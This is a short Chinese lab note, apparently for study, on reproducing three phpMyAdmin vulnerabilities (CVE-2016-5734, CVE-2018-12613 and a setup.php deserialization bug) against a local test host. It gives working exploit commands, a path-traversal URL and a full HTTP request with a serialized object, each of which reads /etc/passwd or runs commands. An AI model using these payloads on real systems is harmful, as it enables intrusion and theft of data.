1.PhpMyAdmin 4.0.x—4.6.2 远程代码执行 (CVE-2016-5734)
操作技巧:
去https://www.exploit-db.com/exploits/40185下载一个exp文件
执行python3 phpmyadmin.py -c 'system(id);' -u root -p root -d test http://192.168.68.129:8080
漏洞原理:
漏洞版本:
4.0.x version before 4.0.10.16
4.4.x version before 4.4.15.7
4.6.x version before 4.6.3 (actually because this version requires PHP5.5+, this vulnerability cannot be reproduced)
2.phpmyadmin远程文件包含漏洞(CVE-2018-12613)
操作技巧:
payload:http://192.168.68.129:8080/?target=db_datadict.php?/../../../../../../../../etc/passwd
漏洞原理:
在对传参的参数进行过滤时,需要过滤代码,但是传参点很多,需要多次输入过滤代码,开发人员考虑到使用将过滤代码写入过滤文件,通过include包含该文件,来达到一个过滤的目的,
假如这个包含的文件是可以控制的,那么就可能导致文件包含,该漏洞中,主要是因为对于传参包含文件的参数过滤时,只是对其内容进行检测白名单验证,只要target参数是白名单中的
参数,同时代码会对?后面的参数进行排除,所以构造出恶意代码target=db_datadict.php?/../../,还有一个原因就是,a?/../,比如在cmd命令行中,cd 到一个不存在的目录,会报错,
但是如果在其后加一个/../,系统会默认认为还是在当前目录,就不会对错误目录进行检查,也就不会报错;综上所有原因,导致了该漏洞的出现。
漏洞版本:phpMyAdmin 4.8.0和4.8.1
3.Phpmyadmin Scripts/setup.php反序列化漏洞 (WooYun-2016-199433)
操作技巧:
POST /scripts/setup.php HTTP/1.1
Host: 192.168.68.129:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: phpMyAdmin=pZb3cMlU0GbpnfHX0mRA4mbWlRd
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
漏洞原理:
漏洞版本:2.x